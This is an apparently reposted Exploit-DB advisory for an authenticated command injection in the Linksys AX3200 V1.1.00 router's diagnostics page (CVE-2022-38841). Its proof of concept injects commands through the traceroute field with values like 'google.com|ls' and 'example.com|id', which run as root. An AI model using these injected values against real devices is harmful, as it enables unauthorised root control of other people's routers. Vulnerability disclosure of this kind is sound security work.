[webapps] Linksys AX3200 V1.1.00 - Command Injection
2023-3-22 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:16 收藏
2023-3-22 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:16 收藏
# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: Linksys
# Version: 1.1.00
# Authentication Required: YES
# CVE : CVE-2022-38841
# Tested on: Windows
# Proof Of Concept:
1 - login into AX3200 webui
2 - go to diagnostics page
3 - put "google.com|ls" to perform a traceroute
4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user
文章来源: https://www.exploit-db.com/exploits/51035
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh